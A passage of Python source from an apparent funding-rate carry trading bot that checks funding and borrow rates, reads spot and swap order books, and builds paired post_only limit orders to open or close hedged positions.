mode_close_long_judge = {'Target_Amount_Close': 0,
# Target_Amount_Close這裡設等於0
'spot_balance': Operation_info[h]['spot_balance'],
'swap_position': Operation_info[h][
'swap_position'],
'swap_close_size': swap_close_size,
'spot_close_size': spot_close_size,
'predict_funding': Necessary_info[h]['Predict_Funding_Rate'],
'present_funding': Necessary_info[h]['Present_Funding_Rate'],
'So_Sc_mode': So_Sc_mode,
'contract_value':Necessary_info[h]['contract_val']}
# close the long carry
close_long_mode, close_long_final_open_mode, close_long_final_close_mode = close_long_judge(mode_close_long_judge)
# print('close_long_mode_12',close_long_mode)
# print('close_long_final_open_mode_12',close_long_final_open_mode)
# print('close_long_final_close_mode_12',close_long_final_close_mode)
elif Necessary_info[h]['Present_Funding_Rate'] < 0:
if Sc > -1 * Necessary_info[h]['Present_Funding_Rate'] * spot_index_price:
swap_instrumentId = h + '-SWAP'
funding_rate_result = publicAPI.get_funding_rate(swap_instrumentId)['data'][0]
time.sleep(0.2)
# If the current funding rate is > 0 and current plus next funding exceeds +0.1%, do not open the short carry
if float(funding_rate_result['fundingRate']) > 0 and float(funding_rate_result['fundingRate']) + float(funding_rate_result['nextFundingRate']) > 0.001:
pass
else:
#print('xc')
# Check how much more of the spot short can still be opened
max_avail_size_result = float(accountAPI.get_max_avail_size(h, 'cross')['data'][0]['availSell'])
time.sleep(0.1)
swap_instrumentId = h + '-SWAP'
funding_rate_result = publicAPI.get_funding_rate(swap_instrumentId)['data'][0]
time.sleep(0.2)
if abs(float(funding_rate_result['fundingRate']) + float(funding_rate_result['nextFundingRate'])) < 0.05 /100 /3: # assumed daily borrow rate of 0.05%, divided by 3 for the three funding intervals per day
# if smaller, do not open more: the carry cannot cover the daily borrow rate
Target_Amount = abs(Operation_info[h]['spot_balance'])
elif max_avail_size_result < spot_size:
# freeze TA at the current spot_balance and do not increase it
Target_Amount = abs(Operation_info[h]['spot_balance']) # abs() because the judge function multiplies by -1
else:
pass # proceed as normal and keep opening the spot short
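# Worked example of the borrow-rate gate above: 0.05% / 3 is roughly 0.0167% per funding interval; if
# |fundingRate + nextFundingRate| stays below that, Target_Amount is frozen at the current
# |spot_balance| so the short-spot leg is not grown further.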
mode_open_short_judge = {'Target_Amount': Target_Amount,
'spot_balance': Operation_info[h]['spot_balance'],
'swap_position': Operation_info[h]['swap_position'],
'swap_size': swap_size,
'spot_size': spot_size,
'contract_value':Necessary_info[h]['contract_val']}
# open the short carry
open_short_mode, open_short_final_open_mode, open_short_final_close_mode = open_short_judge(mode_open_short_judge)
#print('here_ck')
#print('open_short_mode_23',open_short_mode)
if open_long_mode =='on' or open_long_final_open_mode=='on' or open_long_final_close_mode=='on' or open_short_mode=='on' or \
open_short_final_open_mode =='on' or open_short_final_close_mode =='on' or close_short_mode =='on' or\
close_short_final_open_mode =='on' or close_short_final_close_mode =='on' or close_long_mode =='on' or \
close_long_final_open_mode =='on' or close_long_final_close_mode =='on' :
time.sleep(0.3)
# Refresh the top-5 depth snapshots used by the order placement below
# new swap top-5 book
try:
Operation_info[h]['swap_depth5']=MQ[h]["DEPTH5_SWAP"].get(timeout=1)
# swap_depth5 = Operation_info[h]['swap_depth5']
except:
try:
Operation_info[h]['swap_depth5']=Operation_info[h]['swap_depth5']
# swap_depth5=Operation_info[h]['swap_depth5']
except:
Operation_info[h]['swap_depth5']=marketAPI.get_orderbook(h + '-SWAP', '5')['data']
# swap_depth5 = Operation_info[h]['swap_depth5']
time.sleep(0.1)
# new spot top-5 book
try:
Operation_info[h]['spot_depth5']= MQ[h]["DEPTH5_SPOT"].get(timeout=1)
# spot_depth5 = Operation_info[h]['spot_depth5']
# print('spot_depth5 still coming from the websocket ___#')
except:
try:
Operation_info[h]['spot_depth5']= Operation_info[h]['spot_depth5']
# spot_depth5 = Operation_info[h]['spot_depth5']
except:
Operation_info[h]['spot_depth5']= marketAPI.get_orderbook(h, '5')['data']
# spot_depth5 =Operation_info[h]['spot_depth5']
print('h_',h)
print('spot_depth5 fell back to the REST API ___#')
time.sleep(0.1)
if open_long_mode =='on' or open_long_final_open_mode=='on' or open_long_final_close_mode=='on' or open_short_mode=='on' or open_short_final_open_mode =='on' or open_short_final_close_mode =='on':
Operation_info[h]['position_direction']='open'
elif close_short_mode =='on' or close_short_final_open_mode =='on' or close_short_final_close_mode =='on' or close_long_mode =='on' or close_long_final_open_mode =='on' or close_long_final_close_mode =='on':
Operation_info[h]['position_direction']='close'
# if h == 'MINA-USDT':
# print('h', h)
#print('swap_position',Operation_info[h]['swap_position'])
#print('contract_value',Necessary_info[h]['contract_val'])
#print('spot_balance',Operation_info[h]['spot_balance'])
# print('open_long_mode_1',open_long_mode)
# print('open_short_mode_1',open_short_mode)
# print('close_short_mode_1',close_short_mode)
# print('close_long_mode_1',close_long_mode)
# print('open_long_final_open_mode',open_long_final_open_mode)
# print('open_short_final_open_mode',open_short_final_open_mode)
# print('open_long_final_close_mode',open_long_final_close_mode)
# print('open_short_final_close_mode',open_short_final_close_mode)
# print('close_long_final_close_mode',close_long_final_close_mode)
# print('close_short_final_close_mode',close_short_final_close_mode)
# print('close_long_final_open_mode',close_long_final_open_mode)
# print('close_short_final_open_mode',close_short_final_open_mode)
#print('swap_pending_left',Operation_info[h]['swap_pending_list_left'] )
#print('spot_pending_left',Operation_info[h]['spot_pending_list_left'])
open_short_mode ='off'
open_short_final_open_mode ='off'
open_short_final_close_mode ='off'
close_long_mode ='off'
close_long_final_open_mode ='off'
close_long_final_close_mode ='off'
# open_long_mode ='off'
# open_long_final_open_mode ='off'
# open_long_final_close_mode ='off'
# close_short_mode ='off'
# close_short_final_open_mode ='off'
# close_short_final_close_mode ='off'
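# Quoting ladder used by every branch below: the net exposure spot_balance + swap_position * contract_val
# (in coins) is compared against tolerate_limit converted to coins (tolerate_limit / swap_present_price)
# at 1/4, 1/2 and 1x thresholds; the further one leg runs ahead, the more passively that leg is quoted
# (level 2, level 5, or a size of '0'), while the lagging leg stays at best or at the mid price.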
if open_long_mode == 'on':
if (tolerate_limit/2/swap_present_price) > Operation_info[h]['spot_balance']+ Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'] > \
(tolerate_limit / 4/ swap_present_price):
# The spot leg exceeds the swap leg: sell the swap at best and nudge the spot buy back to level 2
mode_take_long_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_price': precfloat(float(Operation_info[h]['spot_depth5'][0]['bids'][1][0]), Necessary_info[h]['spot_tick_digit']),
'swap_price': precfloat(float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]), Necessary_info[h]['swap_tick_digit']),
'spot_size': spot_size,
'swap_size': swap_size,
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
elif (tolerate_limit / swap_present_price) > Operation_info[h]['spot_balance']+ Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'] > \
(tolerate_limit / 2 / swap_present_price):
# The spot leg exceeds the swap leg: sell the swap at the mid price and buy spot at level 5
# Handle quoting at the mid price
# If best ask - best bid > one tick, the mid can be posted; otherwise post at the best ask
if float(Operation_info[h]['swap_depth5'][0]['bids'][0][0]) + Necessary_info[h]['swap_tick_size'] < float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]):
swap_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]) + float(Operation_info[h]['swap_depth5'][0]['bids'][0][0])) / 2, Necessary_info[h]['swap_tick_digit'])
else:
swap_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['asks'][0][0])), Necessary_info[h]['swap_tick_digit'])
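# The mid-price-with-tick-guard pattern above recurs throughout this block; as a sketch only, it is
# equivalent to a small helper like the following (hypothetical, not defined anywhere in this script):
# def mid_or_best(best_bid, best_ask, tick, digits, fallback='ask'):
#     # post the mid when there is at least one tick of room, otherwise fall back to the chosen side
#     if best_bid + tick < best_ask:
#         return precfloat((best_bid + best_ask) / 2, digits)
#     return precfloat(best_ask if fallback == 'ask' else best_bid, digits)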
mode_take_long_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_price': precfloat(float(Operation_info[h]['spot_depth5'][0]['bids'][4][0]), Necessary_info[h]['spot_tick_digit']),
'swap_price': swap_price,
'spot_size': spot_size,
'swap_size': swap_size,
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
elif Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'] > \
(tolerate_limit / swap_present_price):
# The spot leg exceeds the swap leg: spot_size=0; the swap sell used to rest at the best-bid limit, changed 0607 to the mid price
# If best ask - best bid > one tick, the mid can be posted; otherwise post at the best ask
if float(Operation_info[h]['swap_depth5'][0]['bids'][0][0]) + Necessary_info[h]['swap_tick_size'] < float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]):
swap_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]) + float(Operation_info[h]['swap_depth5'][0]['bids'][0][0])) / 2, Necessary_info[h]['swap_tick_digit'])
else:
swap_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['asks'][0][0])), Necessary_info[h]['swap_tick_digit'])
mode_take_long_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_price': precfloat(float(Operation_info[h]['spot_depth5'][0]['bids'][4][0]), Necessary_info[h]['spot_tick_digit']),
'swap_price': swap_price,
'spot_size': '0',
'swap_size': swap_size,
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
elif -1*(tolerate_limit / 2 / swap_present_price) < Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'] + \
Operation_info[h]['spot_balance'] <-1*(tolerate_limit / 4 / swap_present_price):
# The swap leg exceeds the spot leg: buy spot at best and nudge the swap sell to level 2
mode_take_long_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_price': precfloat(float(Operation_info[h]['spot_depth5'][0]['bids'][0][0]), Necessary_info[h]['spot_tick_digit']) ,
'swap_price': precfloat(float(Operation_info[h]['swap_depth5'][0]['asks'][1][0]), Necessary_info[h]['swap_tick_digit']),
'spot_size': spot_size,
'swap_size': swap_size,
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
elif -1*(tolerate_limit / swap_present_price) < Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'] + \
Operation_info[h]['spot_balance'] <-1*(tolerate_limit / 2 / swap_present_price):
# The swap leg exceeds the spot leg: buy spot at the mid price and sell the swap at level 5
# If best ask - best bid > one tick, the mid can be posted; otherwise post at the best bid
if float(Operation_info[h]['spot_depth5'][0]['bids'][0][0]) + Necessary_info[h]['spot_tick_size'] < float(Operation_info[h]['spot_depth5'][0]['asks'][0][0]):
spot_price = precfloat((float(Operation_info[h]['spot_depth5'][0]['asks'][0][0]) + float(Operation_info[h]['spot_depth5'][0]['bids'][0][0])) / 2, Necessary_info[h]['spot_tick_digit'])
else:
spot_price = precfloat((float(Operation_info[h]['spot_depth5'][0]['bids'][0][0])), Necessary_info[h]['spot_tick_digit'])
mode_take_long_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_price': spot_price,
'swap_price': precfloat(float(Operation_info[h]['swap_depth5'][0]['asks'][4][0]), Necessary_info[h]['swap_tick_digit']),
'spot_size': spot_size,
'swap_size': swap_size,
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
elif Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'] + Operation_info[h]['spot_balance'] < -1*(tolerate_limit / swap_present_price):
# The swap leg exceeds the spot leg: buy spot at the opposing price
# If best ask - best bid > one tick, the mid can be posted; otherwise post at the best bid
if float(Operation_info[h]['spot_depth5'][0]['bids'][0][0]) + Necessary_info[h]['spot_tick_size'] < float(Operation_info[h]['spot_depth5'][0]['asks'][0][0]):
spot_price = precfloat((float(Operation_info[h]['spot_depth5'][0]['asks'][0][0]) + float(Operation_info[h]['spot_depth5'][0]['bids'][0][0])) / 2, Necessary_info[h]['spot_tick_digit'])
else:
spot_price = precfloat((float(Operation_info[h]['spot_depth5'][0]['bids'][0][0])), Necessary_info[h]['spot_tick_digit'])
mode_take_long_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_price': spot_price,
'swap_price': precfloat(float(Operation_info[h]['swap_depth5'][0]['asks'][4][0]), Necessary_info[h]['swap_tick_digit']),
'spot_size': spot_size,
'swap_size': '0',
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
else: # default case: rest both legs at best
mode_take_long_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_price': precfloat(float(Operation_info[h]['spot_depth5'][0]['bids'][0][0]), Necessary_info[h]['spot_tick_digit']),
'swap_price': precfloat(float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]), Necessary_info[h]['swap_tick_digit']),
'spot_size': spot_size,
'swap_size': swap_size,
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
#print('mode_take_long_order',mode_take_long_order)
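# Every leg above is sent as a post_only limit order, so both sides only add liquidity; a size of '0'
# is passed for the leg that has already run ahead so that leg is not extended further.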
if open_short_mode == 'on': # the swap holds the long side and spot_balance < 0
if -1*(tolerate_limit / 2 / swap_present_price) < Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'] < -1*(tolerate_limit / 4 / swap_present_price):
# The spot short leg exceeds the swap long leg: buy the swap at best and nudge the spot sell to level 2
mode_take_short_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_price': precfloat(float(Operation_info[h]['spot_depth5'][0]['asks'][1][0]),Necessary_info[h]['spot_tick_digit']),
'swap_price': precfloat(float(Operation_info[h]['swap_depth5'][0]['bids'][0][0]), Necessary_info[h]['swap_tick_digit']),
'spot_size': spot_size,
'swap_size': swap_size,
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
elif -1*(tolerate_limit / swap_present_price) < Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'] < -1*(tolerate_limit / 2 / swap_present_price):
# The spot short leg exceeds the swap long leg: buy the swap at the mid price and sell spot at level 5
# Handle quoting at the mid price
# If best ask - best bid > one tick, the mid can be posted; otherwise post at the best bid
if float(Operation_info[h]['swap_depth5'][0]['bids'][0][0]) + Necessary_info[h]['swap_tick_size'] < float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]):
swap_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]) + float(Operation_info[h]['swap_depth5'][0]['bids'][0][0])) / 2, Necessary_info[h]['swap_tick_digit'])
else:
swap_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['bids'][0][0])), Necessary_info[h]['swap_tick_digit'])
mode_take_short_order = { 'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_price': precfloat(float(Operation_info[h]['spot_depth5'][0]['asks'][4][0]),Necessary_info[h]['spot_tick_digit']),
'swap_price': swap_price,
'spot_size': spot_size,
'swap_size': swap_size,
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
elif Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'] < -1*(tolerate_limit / swap_present_price):
# The spot leg exceeds the swap leg: spot_size=0; the swap buy used to rest at the best-ask limit, changed 0607 to the mid price
# Handle quoting at the mid price
# If best ask - best bid > one tick, the mid can be posted; otherwise post at the best bid
if float(Operation_info[h]['swap_depth5'][0]['bids'][0][0]) + Necessary_info[h]['swap_tick_size'] < float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]):
swap_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]) + float(Operation_info[h]['swap_depth5'][0]['bids'][0][0])) / 2, Necessary_info[h]['swap_tick_digit'])
else:
swap_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['bids'][0][0])), Necessary_info[h]['swap_tick_digit'])
mode_take_short_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_price': precfloat(float(Operation_info[h]['spot_depth5'][0]['asks'][4][0]), Necessary_info[h]['spot_tick_digit']),
'swap_price': swap_price,
'spot_size': '0',
'swap_size': swap_size,
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
elif (tolerate_limit / 2 / swap_present_price) > Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'] + Operation_info[h]['spot_balance'] >(tolerate_limit / 4 / swap_present_price):
# The swap leg exceeds the spot leg: sell spot at best and nudge the swap buy to level 2
mode_take_short_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_price': precfloat(float(Operation_info[h]['spot_depth5'][0]['asks'][0][0]), Necessary_info[h]['spot_tick_digit']),
'swap_price': precfloat(float(Operation_info[h]['swap_depth5'][0]['bids'][1][0]), Necessary_info[h]['swap_tick_digit']),
'spot_size': spot_size,
'swap_size': swap_size,
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
elif (tolerate_limit / swap_present_price) > Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'] + Operation_info[h]['spot_balance'] >(tolerate_limit / 2 / swap_present_price):
# The swap leg exceeds the spot leg: sell spot at the mid price and buy the swap at level 5
# Handle quoting at the mid price
# If best ask - best bid > one tick, the mid can be posted; otherwise post at the best ask
if float(Operation_info[h]['spot_depth5'][0]['bids'][0][0]) + Necessary_info[h]['spot_tick_size'] < float(Operation_info[h]['spot_depth5'][0]['asks'][0][0]):
spot_price = precfloat((float(Operation_info[h]['spot_depth5'][0]['asks'][0][0]) + float(Operation_info[h]['spot_depth5'][0]['bids'][0][0])) / 2, Necessary_info[h]['spot_tick_digit'])
else:
spot_price = precfloat((float(Operation_info[h]['spot_depth5'][0]['asks'][0][0])), Necessary_info[h]['spot_tick_digit'])
mode_take_short_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_price': spot_price,
'swap_price': precfloat(float(Operation_info[h]['swap_depth5'][0]['bids'][4][0]), Necessary_info[h]['swap_tick_digit']),
'spot_size': spot_size,
'swap_size': swap_size,
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
elif Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'] + Operation_info[h]['spot_balance'] > (tolerate_limit / swap_present_price):
# The swap leg exceeds the spot leg: spot used to sell at the opposing price, changed 0607 to the mid price
# Handle quoting at the mid price
# If best ask - best bid > one tick, the mid can be posted; otherwise post at the best ask
if float(Operation_info[h]['spot_depth5'][0]['bids'][0][0]) + Necessary_info[h]['spot_tick_size'] < float(Operation_info[h]['spot_depth5'][0]['asks'][0][0]):
spot_price = precfloat((float(Operation_info[h]['spot_depth5'][0]['asks'][0][0]) + float(Operation_info[h]['spot_depth5'][0]['bids'][0][0])) / 2, Necessary_info[h]['spot_tick_digit'])
else:
spot_price = precfloat((float(Operation_info[h]['spot_depth5'][0]['asks'][0][0])), Necessary_info[h]['spot_tick_digit'])
mode_take_short_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_price': spot_price,
'swap_price': precfloat(float(Operation_info[h]['swap_depth5'][0]['bids'][4][0]), Necessary_info[h]['swap_tick_digit']),
'spot_size': spot_size,
'swap_size': '0',
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
else: # default case: sell spot and buy the swap, both resting at best
mode_take_short_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_price': precfloat(float(Operation_info[h]['spot_depth5'][0]['asks'][0][0]), Necessary_info[h]['spot_tick_digit']),
'swap_price': precfloat(float(Operation_info[h]['swap_depth5'][0]['bids'][0][0]), Necessary_info[h]['swap_tick_digit']),
'spot_size': spot_size,
'swap_size': swap_size,
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
#print('mode_take_short_order',mode_take_short_order)
if close_short_mode =='on': # close the short carry: spot buys back its short, the swap sells to close its long; spot_balance<0, swap_position>0
if -1*(tolerate_limit / 2 / swap_present_price) < Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'] < \
-1*(tolerate_limit / 4 / swap_present_price):
# While closing, the spot leg exceeds the swap leg: speed up the spot buy-back at best and nudge the swap sell to level 2
mode_take_close_short_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_close_price': precfloat(float(Operation_info[h]['spot_depth5'][0]['bids'][0][0]), Necessary_info[h]['spot_tick_digit']),
'swap_close_price': precfloat(float(Operation_info[h]['swap_depth5'][0]['asks'][1][0]), Necessary_info[h]['swap_tick_digit']),
'spot_close_size': spot_close_size,
'swap_close_size': swap_close_size,
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
elif -1*(tolerate_limit / swap_present_price) < Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'] < \
-1*(tolerate_limit / 2 / swap_present_price):
# While closing, the spot leg exceeds the swap leg: speed up the spot buy-back at the mid price and sell the swap at level 5
# Handle quoting at the mid price
# If the spot best ask - best bid > one tick, the mid can be posted; otherwise post at the best bid
if float(Operation_info[h]['spot_depth5'][0]['bids'][0][0]) + Necessary_info[h]['spot_tick_size'] < float(Operation_info[h]['spot_depth5'][0]['asks'][0][0]):
spot_close_price = precfloat((float(Operation_info[h]['spot_depth5'][0]['asks'][0][0]) + float(Operation_info[h]['spot_depth5'][0]['bids'][0][0])) / 2, Necessary_info[h]['spot_tick_digit'])
else:
spot_close_price = precfloat((float(Operation_info[h]['spot_depth5'][0]['bids'][0][0])), Necessary_info[h]['spot_tick_digit'])
mode_take_close_short_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_close_price': spot_close_price,
'swap_close_price': precfloat(float(Operation_info[h]['swap_depth5'][0]['asks'][4][0]), Necessary_info[h]['swap_tick_digit']),
'spot_close_size': spot_close_size,
'swap_close_size': swap_close_size,
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
elif Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'] < \
-1*(tolerate_limit / swap_present_price): # closing the short carry: spot buys back, the swap sells to close; spot_balance<0, swap_position>0
# While closing, the spot leg exceeds the swap leg and the spot buy is too slow: buy spot at the opposing price, now quoted at the mid price
# If the spot best ask - best bid > one tick, the mid can be posted; otherwise post at the best bid
if float(Operation_info[h]['spot_depth5'][0]['bids'][0][0]) + Necessary_info[h]['spot_tick_size'] < float(Operation_info[h]['spot_depth5'][0]['asks'][0][0]):
spot_close_price = precfloat((float(Operation_info[h]['spot_depth5'][0]['asks'][0][0]) + float(Operation_info[h]['spot_depth5'][0]['bids'][0][0])) / 2, Necessary_info[h]['spot_tick_digit'])
else:
spot_close_price = precfloat((float(Operation_info[h]['spot_depth5'][0]['bids'][0][0])), Necessary_info[h]['spot_tick_digit'])
mode_take_close_short_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_close_price': spot_close_price,
'swap_close_price': precfloat(float(Operation_info[h]['swap_depth5'][0]['asks'][4][0]), Necessary_info[h]['swap_tick_digit']),
'spot_close_size': spot_close_size,
'swap_close_size': '0',
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
elif (tolerate_limit / 2 / swap_present_price) > Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'] + \
Operation_info[h]['spot_balance'] > (tolerate_limit / 4 / swap_present_price): # closing the short carry: spot buys back, the swap sells to close; spot_balance<0, swap_position>0
# While closing, the swap leg exceeds the spot leg: speed up the swap close by selling at best and nudge the spot buy to level 2
mode_take_close_short_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_close_price': precfloat(float(Operation_info[h]['spot_depth5'][0]['bids'][1][0]), Necessary_info[h]['spot_tick_digit']),
'swap_close_price': precfloat(float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]), Necessary_info[h]['swap_tick_digit']),
'spot_close_size': spot_close_size,
'swap_close_size': swap_close_size,
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
elif (tolerate_limit / swap_present_price) > Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'] + \
Operation_info[h]['spot_balance'] > (tolerate_limit / 2 / swap_present_price): # closing the short carry: spot buys back, the swap sells to close; spot_balance<0, swap_position>0
# While closing, the swap leg exceeds the spot leg: speed up the swap close by selling at the mid price and buy spot at level 5
# If the swap best ask - best bid > one tick, the mid can be posted; otherwise post at the best ask
if float(Operation_info[h]['swap_depth5'][0]['bids'][0][0]) + Necessary_info[h]['swap_tick_size'] < float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]):
swap_close_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]) + float(Operation_info[h]['swap_depth5'][0]['bids'][0][0])) / 2, Necessary_info[h]['swap_tick_digit'])
else:
swap_close_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['asks'][0][0])), Necessary_info[h]['swap_tick_digit'])
mode_take_close_short_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_close_price': precfloat(float(Operation_info[h]['spot_depth5'][0]['bids'][4][0]), Necessary_info[h]['spot_tick_digit']),
'swap_close_price': swap_close_price,
'spot_close_size': spot_close_size,
'swap_close_size': swap_close_size,
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
elif Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'] + Operation_info[h]['spot_balance'] >\
(tolerate_limit / swap_present_price): # closing the short carry: spot buys back, the swap sells to close; spot_balance<0, swap_position>0
# While closing, the swap leg exceeds the spot leg: the swap close used to sell at the opposing price, changed 0607 to the mid price
# If the swap best ask - best bid > one tick, the mid can be posted; otherwise post at the best ask
if float(Operation_info[h]['swap_depth5'][0]['bids'][0][0]) + Necessary_info[h]['swap_tick_size'] < float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]):
swap_close_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]) + float(Operation_info[h]['swap_depth5'][0]['bids'][0][0])) / 2, Necessary_info[h]['swap_tick_digit'])
else:
swap_close_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['asks'][0][0])), Necessary_info[h]['swap_tick_digit'])
mode_take_close_short_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_close_price': precfloat(float(Operation_info[h]['spot_depth5'][0]['bids'][4][0]), Necessary_info[h]['spot_tick_digit']),
'swap_close_price': swap_close_price,
'spot_close_size': '0',
'swap_close_size': swap_close_size,
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
# print('mode_take_close_short_order',mode_take_close_short_order)
else: # default case: buy back the spot short and sell to close the swap long, both resting at best
mode_take_close_short_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_close_price': precfloat(float(Operation_info[h]['spot_depth5'][0]['bids'][0][0]), Necessary_info[h]['spot_tick_digit']),
'swap_close_price': precfloat(float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]), Necessary_info[h]['swap_tick_digit']),
'spot_close_size': spot_close_size,
'swap_close_size': swap_close_size,
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
if close_long_mode =='on':
if (tolerate_limit / 2 / swap_present_price) > Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'] > (tolerate_limit / 4 / swap_present_price):
# spot sells to close its long, the swap buys to close its short; spot_balance>0, swap_position<0
# While closing, the spot leg exceeds the swap leg: speed up the spot sell at best and nudge the swap buy to level 2
mode_take_close_long_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_close_price': precfloat(float(Operation_info[h]['spot_depth5'][0]['asks'][0][0]), Necessary_info[h]['spot_tick_digit']),
'swap_close_price': precfloat(float(Operation_info[h]['swap_depth5'][0]['bids'][1][0]), Necessary_info[h]['swap_tick_digit']),
'spot_close_size': spot_close_size,
'swap_close_size': swap_close_size,
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
elif (tolerate_limit / swap_present_price) > Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'] > (tolerate_limit / 2 / swap_present_price):
# spot sells to close its long, the swap buys to close its short; spot_balance>0, swap_position<0
# While closing, the spot leg exceeds the swap leg: speed up the spot sell at the mid price and buy the swap at level 5
# If the spot best ask - best bid > one tick, the mid can be posted; otherwise post at the best ask
